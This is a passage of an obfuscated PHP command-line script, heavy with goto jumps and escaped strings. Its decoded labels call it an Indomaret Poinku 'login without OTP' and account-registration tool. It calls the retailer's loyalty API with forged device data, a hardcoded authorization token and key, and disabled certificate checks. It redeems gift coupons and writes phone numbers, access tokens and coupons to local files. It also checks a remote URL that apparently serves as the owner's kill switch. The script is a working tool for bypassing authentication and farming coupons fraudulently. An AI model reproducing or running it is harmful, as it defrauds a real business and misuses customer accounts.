  echo @ZM6iC("\x72\145\x64", "\12\x7e\x7e\176\x7e\x7e\176\176\x7e\176\176\176\x7e\176\x7e\x7e\176\176\176\x7e\x7e\176\176\x7e\x7e\176\x7e\176\176\x7e\x7e\x7e\x7e\x7e\x7e\x7e\176\x7e\176\x7e\x7e\x7e\x7e\x7e\176\176\x7e\x7e\176\xa");
  goto paChL;
  LH0vW:
  echo @zM6ic("\x6e\x65\x76\171", "\x20\x7c\x20\123\143\162\x69\x70\164\x20\111\x44\115\40\x4c\117\107\x49\x4e\x20\x50\117\x49\116\113\125\x20\x54\x41\x4e\x50\101\x20\x4f\x54\x50\12");
  goto LRQ9s;
  ifSLw:
  $efQM2 = count($QRhbE) - 1;
  goto DU2ia;
  ZCjtF:
  $Q8u1Y = @$lImQC["\x64\x61\164\x61"]["\143\x6f\156\164\145\x6e\x74"][13]["\x63\x6f\x75\x70\x6f\x6e\103\157\x64\x65"];
  goto CzdBB;
  w38wp:
  $wDisp = "\173\42\160\150\157\x6e\x65\x4e\165\155\142\x65\162\42\x3a\x22" . $zn5zd . "\x22\x2c\x22\x64\145\166\151\x63\x65\111\144\x22\72\x22" . $aY0el . "\x22\175";
  goto p6p07;
  Wn0sH:
  t5ME1:
  goto Q_oJ7;
  gzViQ:
  if (!($jTEU0 < $S8W9D)) {
    goto nn5qa;
  }
  goto hh5Bb;
  MNFa0:
  MSwAP:
  goto b1o_O;
  Lw5kj:
  $zcN5u = xoZB4(array("\xa"), $tqWr2)[$jTEU0];
  goto LevEA;
  d1XlT:
  echo @zm6IC("\x67\162\145\x65\x6e", "\x4e\x6f\x6d\x6f\x72\x20\x48\x50\40\x41\156\144\x61\x20\x20\72\40");
  goto RO2UM;
  hzy5a:
  $yy9BI = "\60";
  goto kJKzo;
  Vca23:
  echo @zM6iC("\156\x65\x76\x79", "\x53\x6f\x72\162\171\54\40\x54\x68\x69\x73\x20\x53\143\x72\x69\160\x74\x20\x48\141\163\40\102\x65\x65\x6e\40\x52\x65\155\x6f\166\x65\x64\40\102\x79\40\124\x68\x65\40\117\x77\156\x65\x72\41\x21");
  goto ja9Xm;
  wk8VN:
  echo @zm6iC("\171\145\154\x6c\157\x77", "\116\157\x6d\157\162\x20\120\145\156\145\162\151\155\141\40\x20\72\x20");
  goto GdJUg;
  BFumN:
  echo "\xa";
  goto j2aPY;
  pT_BP:
  $zn5zd = $U0YgX;
  goto FMSSY;
  EUIiI:
  echo "\12";
  goto l9zj0;
  LijEy:
  CVvEu:
  goto Gfs_c;
  G_1Lo:
  echo @Zm6Ic("\x79\145\x6c\154\157\x77", "\116\141\155\x61\40\113\x75\160\x6f\156\156\171\x61\x20\x20\40\x20\40\40\40\x3a\40");
  goto mDkhk;
  mM1Qy:
  $yy9BI = "\60";
  goto rYruL;
  k14Mn:
  @unlink("\160\x6f\x69\156\150\160\56\x70\x68\x70");
  goto f0C6o;
  Mk08D:
  $RJnNP = trim(fgets(STDIN));
  goto u44Up;
  DjD3h:
  $D18xv = @$H1g60["\x64\x61\164\x61"]["\x69\x64"];
  goto tLkkX;
  we6J2:
  V36mw:
  goto VtmJu;
  ZiXgl:
  $C04ya = curl_error($C6npe);
  goto q3mFb;
  bRraB:
  echo "\12";
  goto u2o7b;
  iLHhK:
  $iElqk = G1Wxt("\x68\164\x74\x70\163\72\57\x2f\x65\x64\x74\x73\141\160\x70\x2e\151\156\x64\x6f\155\141\x72\x65\164\x70\x6f\151\156\153\x75\56\143\157\155\57\154\157\147\x69\x6e\x2f\x61\160\x69\170\55\61\65\60\62\55\x61\160\151\57\x6f\160\145\156\x2f\160\x69\156\57\x69\163\x2d\160\151\x6e\x2d\x65\x78\151\163\x74\55\142\171\55\160\x68\x6f\156\145\55\x6e\165\155\x62\x65\162", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto nAcOm;
  KEsk1:
  tZ3WW:
  goto VXnb2;
  XMS9r:
  if (!($jTEU0 < $S8W9D)) {
    goto BOYRi;
  }
  goto gNu5p;
  F2SO3:
  $IKJzx = array(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/ppp"));
  goto Yj7KY;
  cfMHq:
  echo "\xa";
  goto RS0jB;
  MY65q:
  $p4iky = @$Ap1KM["\144\x61\164\141"]["\155\145\x6d\142\x65\x72\111\144"];
  goto sBlfA;
  cDMKA:
  UQIJ5:
  goto syYB4;
  AWPnd:
  echo "\xa";
  goto U8SH2;
  EMbAe:
  $D2zwh = "\x30";
  goto Q3ZMp;
  TjTjD:
  $DxrJr = "\x31\60\60\x30\x30\60\x30\60\x30\x30\60\x30\60\60\60\x30\60\x30";
  goto uGUIH;
  qIS9E:
  RhrIJ("\x4b\165\x70\x6f\156\x20\120\157\151\x6e\153\165\40\156\145\x77\56\x74\x78\x74", $QFiev);
  goto C81Xy;
  HikpN:
  if (!($cPDPt == 12)) {
    goto TLXym;
  }
  goto Cq7zJ;
  ZMq7C:
  echo "\xa";
  goto LCrgv;
  KSFIU:
  echo "\12";
  goto ktiz3;
  ELOq3:
  rHN94:
  goto bsKnA;
  n7HcN:
  echo "\123\x61\x6d\x70\x61\x69\40\102\141\x72\x69\x73\x20\113\145\x20\72\x20";
  goto TvO3v;
  Epd7E:
  $v1ZMX = str_replace("\15", '', $wPFxB);
  goto VGfok;
  fDZVQ:
  if (!($fUekS == '')) {
    goto ihbeD;
  }
  goto GuIir;
  f0kag:
  echo @Zm6ic("\x6e\x65\x76\171", $ldzeo);
  goto AEHyE;
  SI53_:
  if (!($ABmxY == "\x4b\x6f\x64\145\40\126\x65\x72\x69\x66\x69\153\x61\163\x69\x20\x79\141\156\x67\x20\153\x61\x6d\165\40\155\x61\163\x75\153\x61\156\40\x73\x61\154\141\150\56")) {
    goto FnQw9;
  }
  goto MOApc;
  FgEJz:
  @unlink("\160\157\151\x6e\150\160\56\x70\x68\x70");
  goto sE3lv;
  yOKeR:
  $Jk9cx = G8PF2("\150\164\x74\160\163\x3a\57\x2f\145\144\x74\x73\141\160\x70\x2e\x69\x6e\144\157\155\141\x72\145\x74\x70\x6f\x69\x6e\153\165\x2e\143\157\155\57\143\x75\163\164\157\155\145\x72\57\x61\160\x69\x78\55\61\x35\60\x32\x2d\x61\160\151\57\155\157\142\x69\x6c\x65\x2f\x64\145\x74\141\x69\x6c\x2d\143\x75\163\x74\x6f\x6d\145\162\x2d\157\162\x69\147\151\x6e", $aY0el, $GOXkU, $mlMLt);
  goto W5OtU;
  w_Cs4:
  $u35jw = count($m0f8X) - 1;
  goto pa3zD;
  HqWju:
  function lQJR6($FK_yc, $zn5zd, $mlMLt)
  {
    goto TY2c8;
    KrV_L:
    fputs($FhLCi, "{$zn5zd}\x7c{$mlMLt}\xa");
    goto YORzy;
    TY2c8:
    $FhLCi = fopen($FK_yc, "\x61");
    goto KrV_L;
    YORzy:
    fclose($FhLCi);
    goto IJvZV;
    IJvZV:
  }
  goto oow_c;
  AQXMs:
  echo @zM6ic("\171\x65\154\x6c\157\x77", "\x4e\141\155\141\x20\x4b\165\x70\x6f\x6e\x6e\x79\x61\x20\40\x20\x20\x20\x20\40\72\x20");
  goto rP8OU;
  P5yoE:
  $Jk9cx = g8Pf2("\x68\x74\x74\x70\x73\72\57\x2f\145\144\x74\163\x61\x70\x70\56\x69\x6e\x64\x6f\x6d\x61\162\x65\164\160\x6f\151\156\153\x75\56\x63\157\155\57\x63\165\163\164\x6f\x6d\x65\x72\57\141\160\151\170\55\x31\65\x30\62\x2d\141\x70\x69\x2f\x69\x73\55\167\x68\x61\x74\163\141\160\160\x2d\166\145\162\151\146\x69\145\x64", $aY0el, $GOXkU, $mlMLt);
  goto j3Ixl;
  Xv3BQ:
  echo @zm6iC("\171\145\x6c\154\157\167", "\x4e\x61\155\141\40\113\165\160\x6f\156\x6e\x79\141\x20\40\x20\40\40\x20\x20\x3a\40");
  goto yvqsu;
  jLvP7:
  I1Quu:
  goto soKJc;
  fDgG7:
  echo @zm6iC("\156\x65\x76\x79", "\123\x6f\162\x72\x79\x2c\40\x54\x68\x69\163\x20\x53\x63\162\x69\160\x74\40\110\x61\163\x20\x42\145\x65\156\40\x52\x65\x6d\157\166\x65\144\x20\x42\171\40\x54\x68\x65\40\117\167\156\145\x72\41\41");
  goto WdaDw;
  PqKxD:
  $upOL9 = g8pF2("\150\164\164\160\x73\x3a\57\57\x65\x64\x74\x73\141\x70\160\x2e\151\156\144\157\x6d\x61\x72\x65\164\160\x6f\151\156\x6b\x75\56\x63\x6f\x6d\x2f\154\157\171\x61\x6c\164\x79\x2f\x61\x70\151\x78\x2d\61\x35\60\x32\55\141\160\151\x2f\x6d\x6f\142\x69\154\145\x2f\160\157\x69\156\x74\163\57\x6d\x65\57\143\157\165\x70\157\156\163\x3f\x70\141\x67\x65\x3d\60\x26\x73\x6f\162\164\x3d\141\155\157\165\156\164\x25\x32\x43\x61\x73\x63\46\x73\157\x72\164\75\x6e\x61\x6d\145\x25\x32\x43\141\163\143\46\x73\x69\172\x65\x3d\x31\60\60\x30", $aY0el, $GOXkU, $mlMLt);
  goto d802g;
  yibUd:
  if (!($ABmxY == "\113\157\144\145\40\x56\145\162\x69\x66\x69\x6b\141\163\x69\40\171\141\156\x67\40\153\x61\155\x75\40\x6d\141\163\x75\x6b\x61\156\x20\x73\141\x6c\x61\x68\56")) {
    goto QWuXy;
  }
  goto eQwBm;
  XYMLf:
  if (!($jTEU0 < $S8W9D)) {
    goto ADNin;
  }
  goto n_ddg;
  aZIpz:
  echo "\115\x75\x6c\x61\x69\x20\x42\x61\x72\x69\x73\40\x4b\145\40\40\72\x20";
  goto Mws1Z;
  B_JBr:
  goto CjBGa;
  goto ai408;
  SnZeB:
  rhRij("\x4b\x75\x70\x6f\x6e\x20\120\157\x69\x6e\x6b\x75\x20\x6e\145\x77\56\x74\x78\164", $gwQ0n);
  goto I58TZ;
  ZoliY:
  print_r($zcN5u);
  goto OWKNy;
  SFpTg:
  $efQM2 = count($QRhbE) - 1;
  goto kMDXZ;
  Xl42B:
  $yy9BI = "\x30";
  goto mZygY;
  OqLtw:
  echo @zM6IC("\147\x72\145\x65\x6e", "\x4e\157\155\x6f\x72\x20\x48\120\x20\101\156\144\141\x20\40\x3a\x20");
  goto qkqcs;
  uUFQx:
  MxwyD:
  goto HC4Z1;
  If3cN:
  function Br93Z($lEbop, $wDisp = null)
  {
    goto CcCmO;
    zzRKD:
    $ECuqv = curl_exec($C6npe);
    goto Y8yRk;
    U31t7:
    $ruc3h[] = "\110\157\163\164\72\x20\141\163\x69\x61\55\163\157\x75\164\150\145\x61\x73\x74\x32\x2d\151\144\x6d\55\143\157\162\160\55\160\162\x64\56\143\x6c\157\x75\144\x66\165\x6e\143\x74\x69\x6f\x6e\x73\56\x6e\x65\x74";
    goto tetnG;
    y0LSY:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto NuRWH;
    HIcnw:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto BLmdy;
    tetnG:
    $ruc3h[] = "\x63\x6f\156\164\x65\x6e\x74\x2d\x74\x79\x70\145\x3a\x20\141\160\160\x6c\151\x63\x61\164\x69\157\156\x2f\152\163\157\156\x3b\40\x63\150\141\162\163\x65\164\75\125\124\106\55\70";
    goto PAaD_;
    tM0sV:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto HIcnw;
    g_VXt:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto tM0sV;
    F9gYj:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto y0LSY;
    NuRWH:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\x6e\144\x6f\x2e\164\x78\164");
    goto R4T3k;
    jm78m:
    l9Hlb:
    goto uHVLy;
    BLmdy:
    $ruc3h[] = "\165\x73\x65\x72\55\x61\147\145\156\x74\x3a\40\157\x6b\x68\x74\x74\x70\x2f\64\56\71\56\x30";
    goto zh6Vx;
    R4T3k:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\x6e\144\x6f\x2e\164\x78\164");
    goto zzRKD;
    k3qPS:
    if (!$P7lm9) {
      goto l9Hlb;
    }
    goto ZZbtD;
    k3glQ:
    $AXlcQ = json_decode($y7f11, true);
    goto IkRwM;
    PAaD_:
    $ruc3h[] = "\141\x75\x74\x68\x6f\x72\151\x7a\x61\164\151\157\x6e\x3a\40\x4e\116\x4b\123\x6b\124\x64\157\157\x51\157\x37\166\125\x47\126\x47\x35\x65\x47\x6b\147\x59\123\126\x57\67\x53\x61\142\x53\152\146\x66\141\x66\x61\x6f\x33\x35\x6e\146\x6f\141\x6e\x33\x79\x67\146\x61\x61";
    goto cbjwU;
    V2HLk:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto NRaLO;
    zh6Vx:
    $ruc3h[] = "\141\x63\x63\x65\160\x74\55\x65\x6e\x63\157\x64\151\156\147\72\x20\147\x7a\x69\x70";
    goto U31t7;
    utqNN:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto g_VXt;
    Y8yRk:
    $P7lm9 = curl_getinfo($C6npe);
    goto k3qPS;
    uHVLy:
    return false;
    goto wJO7L;
    AVch1:
    return $ECuqv;
    goto OpjCm;
    cbjwU:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto wdfO1;
    IkRwM:
    print_r($AXlcQ);
    goto AVch1;
    wJO7L:
    xAeZA:
    goto k3glQ;
    CcCmO:
    $C6npe = curl_init();
    goto utqNN;
    ZZbtD:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto V2HLk;
    NRaLO:
    goto xAeZA;
    goto jm78m;
    wdfO1:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto F9gYj;
    OpjCm:
  }
  goto fGnXq;
  R30MJ:
  B_12r:
  goto lUgya;
  BFRXN:
  echo $BcbF3;
  goto nWNE3;
  PTWfM:
  echo "\xa";
  goto tXZim;
  AY5hr:
  $JaDCq = $PQA77;
  goto jhRqg;
  ZsgDH:
  RZv4q:
  goto uBAdz;
  ZiZaH:
  $efQM2 = count($QRhbE) - 1;
  goto FZc3k;
  jfh1u:
  echo @zm6ic("\171\145\154\x6c\157\167", "\x53\164\141\x74\165\163\40\x50\x65\143\x61\150\151\156\40\101\171\141\x6d\40\x3a\40");
  goto lxpuD;
  Fb74W:
  $wDisp = "\173\42\144\141\x74\x61\x22\x3a\133\x7b\42\x61\160\160\x6c\x69\143\141\164\x69\x6f\x6e\x22\x3a\173\42\141\x70\160\137\x76\x65\x72\163\x69\x6f\x6e\42\x3a\42\63\56\61\x33\56\60\x22\x2c\x22\x64\145\x76\151\x63\x65\137\x63\154\x61\x73\x73\x22\72\42\120\150\x6f\156\x65\x22\54\x22\x64\x65\x76\151\x63\145\x5f\146\141\x6d\x69\x6c\171\42\72\x22" . $GOXkU . "\x22\x2c\42\x64\145\166\x69\143\x65\137\151\x64\42\x3a\x22" . $aY0el . "\x22\x2c\x22\157\163\137\156\141\x6d\x65\x22\x3a\42\x41\x6e\x64\x72\157\x69\144\40\x50\x22\54\x22\x6f\163\x5f\x76\x65\162\163\x69\x6f\x6e\42\72\x22\x41\x6e\144\162\x6f\151\x64\x20\71\x22\x7d\x2c\x22\143\x6f\162\x65\x22\x3a\173\x22\x65\x76\145\156\164\x5f\154\141\x62\145\154\42\x3a\42\x6c\157\147\151\x6e\42\54\x22\145\166\x65\x6e\x74\137\156\141\155\x65\x22\72\x22\145\166\145\x6e\x74\x5f\x73\x75\142\x6d\x69\x73\163\151\x6f\156\42\x2c\42\x65\x76\x65\x6e\164\137\x73\164\x61\164\165\x73\42\72\x22\x73\165\x63\x63\145\163\163\42\54\x22\x65\166\145\156\164\137\164\x69\155\145\x73\164\141\155\160\x22\72" . $nb9cm . "\x7d\54\x22\155\141\x72\153\145\164\x69\x6e\x67\x22\x3a\173\x22\165\x74\155\x5f\x72\x61\167\x22\72\x22\165\164\x6d\137\x73\x6f\165\x72\143\x65\x3d\147\x6f\x6f\147\154\x65\55\x70\154\141\x79\46\x75\164\155\137\x6d\145\x64\x69\x75\155\75\157\162\147\141\x6e\151\143\x22\175\x2c\x22\165\163\x65\x72\x22\x3a\x7b\x22\x73\x65\163\x73\151\157\x6e\x5f\151\144\x22\x3a\x22" . $MXjqh . "\42\54\x22\x75\163\x65\162\x5f\151\x70\137\x61\144\144\162\x65\163\x73\42\72\42\61\62\67\56\x30\56\60\56\61\x22\175\175\135\175";
  goto gSmff;
  yvEV4:
  NNMbo:
  goto vx1TV;
  NYvnF:
  echo "\12";
  goto Cbxgb;
  W3rdR:
  nB5sV:
  goto ioDGw;
  fPDTC:
  $yJiD4 = @$owfHy["\144\141\x74\x61"][$dQ8Tp]["\144\151\163\164\162\x69\x63\x74\x4e\x61\x6d\145"];
  goto ODdXV;
  QIBEy:
  if ($rVPVc == '') {
    goto tVK8J;
  }
  goto uTH7V;
  usfrB:
  echo "\xa";
  goto dJ2RH;
  o6YWQ:
  goto GV2ko;
  goto XQRKG;
  o0dYP:
  $XDyMm = @$Ap1KM["\x64\141\x74\141"]["\142\141\154\x61\156\x63\145"];
  goto qYGDe;
  s2xDv:
  echo "\xa";
  goto m1FX4;
  vtZNG:
  sleep(5);
  goto mHLe6;
  F_w9s:
  $AxbWA = xWL4L();
  goto rX_9S;
  s9534:
  echo "\12";
  goto M10jD;
  gPucm:
  $p4iky = @$Ap1KM["\x64\141\164\141"]["\155\145\155\142\145\x72\111\x64"];
  goto n_WdW;
  f9R6b:
  $kp_uF = @$nPb0z["\144\x61\164\x61"]["\x69\x73\x4e\145\x77\122\x65\147\x69\163\x74\145\162"];
  goto OO8Xp;
  hijh7:
  SXxFu:
  goto jgBkc;
  RY_tp:
  echo "\xa";
  goto bY0qY;
  U7gXf:
  $efQM2 = count($QRhbE) - 1;
  goto Znx5G;
  wo9IC:
  $zvt88 = $QRhbE;
  goto dSUW6;
  rP8OU:
  echo @zm6IC("\x6e\x65\x76\x79", $ZNU2M);
  goto tYb9o;
  PZVdK:
  echo @zM6iC("\156\x65\166\171", "\x20\174\40\x53\x63\x72\x69\160\x74\x20\x49\104\115\40\x52\105\107\x49\x53\124\105\x52\40\x50\117\111\x4e\x4b\125\12");
  goto Ls8hJ;
  padaL:
  mXaLJ:
  goto IBHxa;
  Zi5Xi:
  $D2zwh++;
  goto HqqQS;
  Gj86c:
  $t4wQX = @$lImQC["\144\x61\164\141"]["\143\157\x6e\164\145\156\164"][12]["\x63\157\165\x70\x6f\x6e\x4e\141\155\145"];
  goto DyuhB;
  a_Crt:
  echo @ZM6ic("\x79\145\x6c\154\157\x77", "\x4d\x75\154\141\151\40\x50\x65\x6e\165\153\x61\x72\x61\x6e\40\72\40");
  goto At2qS;
  Mz5t0:
  echo @Zm6IC("\x6e\145\x76\171", $b2ucB);
  goto O3LwN;
  jMYW0:
  echo "\12";
  goto cd3Bo;
  CSUr1:
  $cod3H = fq6W0();
  goto jE9nl;
  cQJu1:
  $m5BZY = ggGr_("\x68\x74\x74\160\x73\x3a\57\x2f\141\163\x69\141\55\x73\157\165\x74\150\145\x61\x73\164\x32\x2d\x69\x64\x6d\x2d\x63\157\x72\160\55\160\x72\144\x2e\143\x6c\157\x75\144\x66\165\156\143\164\151\157\x6e\x73\x2e\x6e\145\x74\x2f\151\x64\155\141\x70\160\163\137\164\162\141\x63\153\x65\162\137\x67\x61\164\145\x77\141\171", $wDisp);
  goto tJibk;
  j2aPY:
  $yy9BI = "\x30";
  goto ZMq7C;
  GiiQv:
  $wDisp = "\173\x22\x64\x61\x74\x61\x22\x3a\133\x7b\42\x61\160\160\x6c\x69\x63\141\164\x69\x6f\x6e\x22\x3a\173\42\141\x70\160\x5f\166\x65\162\163\151\x6f\x6e\42\72\x22\63\56\61\63\56\x30\x22\54\x22\144\x65\166\151\x63\145\x5f\143\154\141\163\x73\x22\72\42\x50\x68\157\156\145\42\54\x22\144\x65\166\151\x63\145\x5f\146\141\x6d\151\154\171\42\x3a\x22" . $GOXkU . "\x22\x2c\x22\144\x65\166\x69\143\x65\x5f\x69\144\42\x3a\42" . $aY0el . "\x22\x2c\x22\x6f\163\x5f\156\141\x6d\145\42\72\42\101\x6e\x64\162\157\x69\144\40\x50\42\54\x22\157\x73\137\x76\x65\162\x73\151\157\156\x22\x3a\42\x41\156\144\162\157\151\144\40\71\42\175\x2c\x22\x63\157\162\145\x22\72\173\42\144\x65\x74\x61\151\x6c\163\x22\x3a\x7b\42\151\163\x61\x6b\x75\x5f\x73\x74\141\x74\165\x73\x22\x3a\42\x48\165\142\165\x6e\x67\153\141\156\42\175\x2c\x22\x65\x76\145\x6e\164\137\x6e\x61\x6d\145\x22\72\x22\160\141\x67\145\137\x64\145\x74\141\151\154\x22\54\42\x65\166\145\x6e\164\137\x74\151\x6d\145\163\164\141\155\x70\42\x3a" . $nb9cm . "\x2c\42\x70\x61\147\x65\x5f\156\x61\x6d\145\42\x3a\42\151\x73\x61\x6b\x75\x22\175\54\x22\155\141\162\x6b\x65\x74\151\x6e\x67\42\x3a\173\x22\x75\164\x6d\x5f\162\x61\167\x22\x3a\x22\165\164\155\x5f\163\157\x75\x72\143\145\x3d\x67\x6f\x6f\x67\x6c\145\55\160\x6c\141\171\46\165\x74\155\x5f\155\x65\x64\x69\165\155\x3d\157\162\147\x61\156\x69\143\x22\175\54\x22\x75\163\145\x72\x22\72\173\x22\x73\x65\x73\163\x69\157\x6e\137\151\x64\x22\72\42" . $MXjqh . "\42\54\42\165\x73\145\162\x5f\x69\144\x22\x3a" . $R_bYC . "\54\42\x75\x73\x65\x72\x5f\x69\x70\137\141\x64\144\x72\145\163\x73\42\72\42\61\x32\x37\56\60\x2e\x30\x2e\61\x22\175\x7d\135\175";
  goto BvCfg;
  VaxP_:
  echo "\xa";
  goto JrA1b;
  uNK1N:
  $nb9cm = round(microtime(true) * 1000);
  goto N0fHh;
  nE0JD:
  sleep(2);
  goto o1wNp;
  vaDzD:
  $mlMLt = @$owfHy["\x64\x61\x74\x61"]["\141\x63\143\145\x73\x73\x5f\164\x6f\153\145\x6e"];
  goto W_0f1;
  B7_L8:
  $I2tFV = @$owfHy["\x64\141\164\141"]["\143\x6f\x6e\x74\x65\156\164"][$D2zwh]["\141\155\x6f\165\x6e\164"];
  goto WiRh7;
  NPalc:
  $qaGLY = str_replace("\x2d", '', $AxbWA);
  goto wlKpJ;
  mdOEh:
  xjSqb:
  goto eFdhA;
  yAXnQ:
  echo "\12";
  goto RERXA;
  Q87m9:
  echo @zM6iC("\156\145\166\171", $SR3ui);
  goto MXmci;
  xQq0X:
  YUYuF:
  goto BjSHt;
  swve1:
  echo "\12";
  goto ImlhV;
  IgsmW:
  $lPULW = $m0f8X;
  goto Y4wH0;
  ft7vH:
  q9_1d:
  goto syrF8;
  PNvRG:
  if (!($D2zwh < $ogbF4)) {
    goto y1Iam;
  }
  goto VZdN4;
  DU2ia:
  $zvt88 = $QRhbE;
  goto Y4tmI;
  uG5i5:
  echo $v9NcH;
  goto lzit9;
  a8A3B:
  goto VVlAK;
  goto hJ8Yw;
  zowCb:
  $XDyMm = @$Ap1KM["\144\141\164\x61"]["\x62\x61\154\141\x6e\x63\x65"];
  goto wdlw0;
  fumDL:
  @unlink("\160\x6f\x69\x6e\150\x70\56\160\x68\160");
  goto Ssnqn;
  WWbCv:
  qf4ti:
  goto YzXDq;
  sGyE9:
  echo @zm6iC("\x79\145\x6c\x6c\x6f\x77", "\116\x61\155\x61\40\113\x65\x6c\165\162\x61\150\x61\156\40\72\x20");
  goto f0kag;
  RdPLe:
  echo "\x45\162\162\157\162\x20\144\x65\154\x65\x74\x69\x6e\147\40{$xp_1p}\40\x20";
  goto SoiZ3;
  HFPOn:
  echo "\115\x75\x6c\141\x69\x20\102\x61\x72\x69\163\x20\x4b\x65\40\x20\x3a\x20";
  goto buUjn;
  VdRrs:
  $m5BZY = Gggr_("\x68\164\x74\x70\163\x3a\57\x2f\x61\x73\151\x61\55\x73\157\165\x74\150\x65\x61\x73\164\x32\x2d\x69\144\x6d\55\x63\x6f\162\x70\x2d\x70\162\x64\56\x63\154\x6f\165\x64\x66\165\156\x63\x74\x69\157\156\163\x2e\x6e\145\164\57\151\144\x6d\141\x70\160\163\x5f\x74\x72\141\143\x6b\x65\x72\x5f\x67\141\x74\145\x77\x61\x79", $wDisp);
  goto bSVki;
  wuvlF:
  echo @Zm6IC("\171\145\154\x6c\157\x77", "\x50\145\163\141\156\x20\72\40");
  goto To2Qr;
  P07mA:
  echo "\xa";
  goto NGTs5;
  XHDw3:
  $p4iky = @$Ap1KM["\144\x61\164\141"]["\x6d\145\155\x62\145\162\x49\144"];
  goto O5Ks7;
  NreZy:
  echo @zm6IC("\171\145\154\154\x6f\167", "\x53\x43\x41\x4e\x20\x42\x41\x52\x43\x4f\104\105\x20\x49\116\x49\x20\101\x47\101\122\40\113\x41\123\x49\x52\40\114\105\102\111\x48\40\115\x55\104\101\x48\56\56");
  goto VGfv_;
  aa4PH:
  echo $jTEU0;
  goto wHw05;
  Ndfha:
  goto nNgh2;
  goto qBG1z;
  BoJhr:
  $XTuz1 = G1WxT("\x68\164\x74\x70\163\x3a\57\x2f\145\144\164\x73\141\x70\160\56\x69\x6e\x64\157\155\141\162\x65\164\x70\157\x69\x6e\x6b\165\56\143\157\155\x2f\x63\x6f\165\x70\x6f\156\57\141\160\x69\170\55\x31\x35\60\x32\55\x61\x70\151\x2f\155\157\x62\151\154\145\57\147\x69\146\164\57\162\x65\144\x65\145\x6d", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto QTf4t;
  W3YD7:
  $nb9cm = round(microtime(true) * 1000);
  goto nlTa3;
  HVusa:
  RBkow:
  goto k7huS;
  wabM5:
  $m5BZY = gGgR_("\x68\164\x74\x70\x73\72\x2f\57\141\x73\x69\141\x2d\163\157\165\x74\x68\145\x61\x73\x74\62\55\151\144\155\x2d\143\x6f\162\x70\x2d\160\x72\x64\x2e\x63\154\x6f\x75\144\x66\165\156\143\164\151\x6f\156\163\56\x6e\145\164\57\x69\x64\155\x61\160\x70\x73\137\164\x72\141\x63\153\145\162\x5f\x67\x61\x74\x65\167\x61\x79", $wDisp);
  goto U17fx;
  tUsG6:
  rhRIJ("\113\165\x70\157\x6e\40\120\157\151\156\153\165\40\156\145\167\x2e\164\x78\x74", $f2A4u);
  goto q9l5G;
  Q3ZMp:
  $ogbF4 = "\x33\60";
  goto hBlw0;
  CNwmE:
  $efQM2 = count($QRhbE) - 1;
  goto RixsK;
  G7Qw6:
  die;
  goto gQD3z;
  UslVr:
  function K8kY7($lEbop, $aY0el, $GOXkU, $vDxFA)
  {
    goto rwnfc;
    IDHGR:
    $ruc3h[] = "\141\x75\164\150\157\x72\x69\x7a\x61\x74\x69\157\x6e\72\40\102\145\x61\162\145\162\40" . $vDxFA;
    goto Gr_LY;
    hJZUA:
    print_r($AXlcQ);
    goto WubET;
    Gr_LY:
    $ruc3h[] = "\x48\157\163\164\x3a\x20\x65\x64\164\163\141\x70\x70\56\151\x6e\144\x6f\x6d\141\162\145\164\x70\x6f\x69\x6e\x6b\x75\56\x63\157\155";
    goto a3hGz;
    ISnMq:
    $ruc3h[] = "\165\x73\145\x72\x2d\141\147\145\156\164\x3a\x20\x6f\x6b\x68\x74\164\160\57\64\56\x39\56\x30";
    goto IDHGR;
    LSIB1:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto EJpOf;
    StumP:
    goto DRciG;
    goto xy8ij;
    XOVd1:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\x6e\x64\x6f\56\164\170\x74");
    goto b3TeN;
    ae9if:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto YhwlO;
    iup38:
    $P7lm9 = curl_getinfo($C6npe);
    goto qI01W;
    T7F8p:
    $ECuqv = curl_exec($C6npe);
    goto iup38;
    WubET:
    return $ECuqv;
    goto kH8ZF;
    qI01W:
    if (!$P7lm9) {
      goto Tw34E;
    }
    goto UUAgD;
    YhwlO:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto PMU6h;
    rwnfc:
    $C6npe = curl_init();
    goto ae9if;
    a3hGz:
    $ruc3h[] = "\x6b\145\x79\x3a\x20\x5a\127\x52\x30\x63\x7a\111\x77\115\x6a\105\66\x4d\x48\102\x73\142\x57\x39\162\142\x67\x3d\75";
    goto U4dES;
    U4dES:
    $ruc3h[] = "\173\42\141\160\160\137\x76\145\162\163\151\157\x6e\42\72\42\63\x2e\61\x33\x2e\60\x22\54\x22\x64\x65\x76\x69\143\145\x5f\143\x6c\141\x73\x73\42\72\x22\x50\x68\157\156\x65\42\54\x22\x64\145\166\x69\143\145\x5f\146\141\x6d\x69\x6c\x79\x22\72\42" . $GOXkU . "\42\54\42\144\145\166\151\143\x65\137\x69\144\x22\x3a\x22" . $aY0el . "\42\x2c\42\157\x73\x5f\156\141\x6d\145\42\72\x22\101\156\x64\162\157\151\144\x20\120\x22\x2c\x22\x6f\x73\137\x76\x65\x72\x73\151\157\156\x22\72\42\x41\x6e\x64\162\x6f\x69\144\x20\x39\x22\175";
    goto s_fgE;
    UUAgD:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto Igfu6;
    EJpOf:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto XOVd1;
    aouE0:
    return false;
    goto jsIIZ;
    xy8ij:
    Tw34E:
    goto aouE0;
    s_fgE:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
